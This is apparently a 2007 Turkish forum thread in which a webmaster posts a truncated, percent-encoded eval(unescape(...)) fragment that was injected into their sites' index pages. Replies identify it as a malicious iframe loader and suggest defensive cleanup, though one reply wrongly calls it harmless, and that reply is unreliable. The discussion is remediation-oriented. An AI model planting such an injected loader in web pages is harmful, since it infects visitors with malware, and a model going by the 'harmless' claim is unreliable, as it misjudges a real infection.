Arama butonu
Bu konudaki kullanıcılar: 1 misafir, 1 mobil kullanıcı
9
Cevap
1049
Tıklama
0
Öne Çıkarma
Bu script e rastlayan?
H
19 yıl (373 mesaj)
Yüzbaşı
Konu Sahibi

bu script e rastlayan varmı?.... eval ( unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%6 böleeeeeeeeeeeeeeeeeeeee giden bi kod sitelerimize daldı arkadaşlar daha önce rastlayan varmı?
bizden kimse site içeriği ile uğraşmıyor zaman ayarlı gibi gecenin köründe 4 te bazen sabahın 7 sinde index e giriyor kod u atıyor...
sitenin arkaplanını yok ediyor arasıra siteyi sağ a uzatıyor bazen linkleri yok ediyor ...
hosttan diyicem sadece uğraştığım sitelerde böle bi sorun mevcut diğer sitelerimizde sorun yok ozaman bilgisayarımdan kaynaklanıyor 3 tane antivirüs ile tarattım index.dat çıktı Ad - Aware_2007 de 32 tane diğerleri birşey bulamadı
son zamanlardada siteye girdiğimizde .exe virüsü yakaladı antivir...
formattan başka şansım yok gibi...

belki başka bi sorundur



L
19 yıl (98 mesaj)
Çavuş

bu javascript'in şifrelemesi gibi görünüyor. kodları gizlemek için yapılır. unescape javascript felan diye aratırsan çıkar.


Bu mesaja 1 cevap geldi.
P
19 yıl (27 mesaj)
Onbaşı

javascript ile yapılan kodların gizlenmesi için bişey. zararlı bir şey yok. sayfanın yapısının değişmesi mümkün çünkü css ve diğer bazı karakterlerde sorun yaşayabiliyor buda sitenin sağa sola kaymış arkaplanı değişmiş şekilde görünmesine sebeb oluyor.

bunun için host firmanla görüş.muhtemelen onların bir etkisi vardır derim


Bu mesaja 1 cevap geldi.
T
18 yıl (418 mesaj)
Yüzbaşı

o virus buyuk ihtimal çokda yaygın server adminizle görüşün muhtemelen kullandığınız scriptlerde veya server da açık var.
çok buyuk ihtimalde trojan yaymakta millete.
formatda atsanız scriptlerde açık varsa gene girer.





< Bu mesaj bu kişi tarafından değiştirildi turkscan -- 25 Aralık 2007; 1:09:08 >
Bu mesaja 1 cevap geldi.
D
18 yıl (5334 mesaj)
Binbaşı

Bir virüse benziyor.Zateb yaptıklarından bellidir


Bu mesaja 1 cevap geldi.
N
18 yıl (7922 mesaj)
Yarbay

javascripti decode edince ortaya frame ile başka bir php sayfasının açıldığı ortaya çıkar.

o sayfada da virüs olduğu için antivirüs uyarıyor.

bana da oldu index.php ve login.php lerde vard sildim.bir daha gelmedi ama gelenler de varmış.

senin bilgisayarından da olabilir sunucudan da.

bulaşan dosyaların chmod unu 444 ile eklenmesini engelleyebilirsin ama kökten çözüm bulmak en iyisi tabi.



S
18 yıl (94 mesaj)
Çavuş

Dostum öncelikle şunu belirteyim hosting ile alakalı şifrelerin sanıyorum hotmail.com hesabında...
izleyecegin yolu kısaca özetleyeyim.
ilk önce şifrelerini (domain ve hostingle ilgili tüm şifreler vs..)hotmail mynet gibi sunucularda barındırmamalısın.cpanelden kullanıcı ayarları kısmından mail adresini değiştir.
ikinci adım ise index e yapışmış olan bu java script i yani bug u silip dosyalarını virüs taramasından geçirdikten sonra bir ftp programı yardımı ile upload etmelisin...


Bu mesaja 1 cevap geldi.
S
18 yıl (6712 mesaj)
Binbaşı

sitenizde eğer herhangibi biryerden text girişi yaptırıyorsanız birileri bunu sitenize java kodu vs olarak enjekte etmiş olabilir.


Bu mesaja 1 cevap geldi.
N
18 yıl (7922 mesaj)
Yarbay

quote:

Orjinalden alıntı: prescott_pcl

sitenizde eğer herhangibi biryerden text girişi yaptırıyorsanız birileri bunu sitenize java kodu vs olarak enjekte etmiş olabilir.

O da olabilir de bu host ile alakalı.Geçen de bulaştı 2.defa oldu bu ve yine aynı hosttaki siteye bulaştı.Bilgisayardan gelse diğer sitelere de gelirdi.Yani tamamen host ile alakalı düşünüyorum artık.


Bu mesaja 1 cevap geldi.
W
18 yıl (449 mesaj)
Teğmen

Kardeş bu script anamı ağlattı benim :D 5-6 tane siteme bulaştı hergün temizliyorum hergün bulaşıyordu.
kesin çözümü buldum gibi aslında. Komple hostunu yedekle bilgisayarına sonra içindeki zararlı kodları temizle eval unspace ile başlayanlar genelde default dosyalarına atıyor.Bu arada resim felan yükleme yapıyorsan klasörlerinin içinede bak yükleme yapılan klasörlere 8-10 tane html dosyası da atıyor.
hostu komple sil ve tekrardan oluştur. temizledigin dosyalarını yükle daha bişey olmaz. Ben bizzat bu sorunla karşılaştım bu şekilde yaptım bi daha da olmadı. Şimdiden kolay gelsin



DH Mobil uygulaması ile devam edin. Mobil tarayıcınız ile mümkün olanların yanı sıra, birçok yeni ve faydalı özelliğe erişin. Gizle ve güncelleme çıkana kadar tekrar gösterme.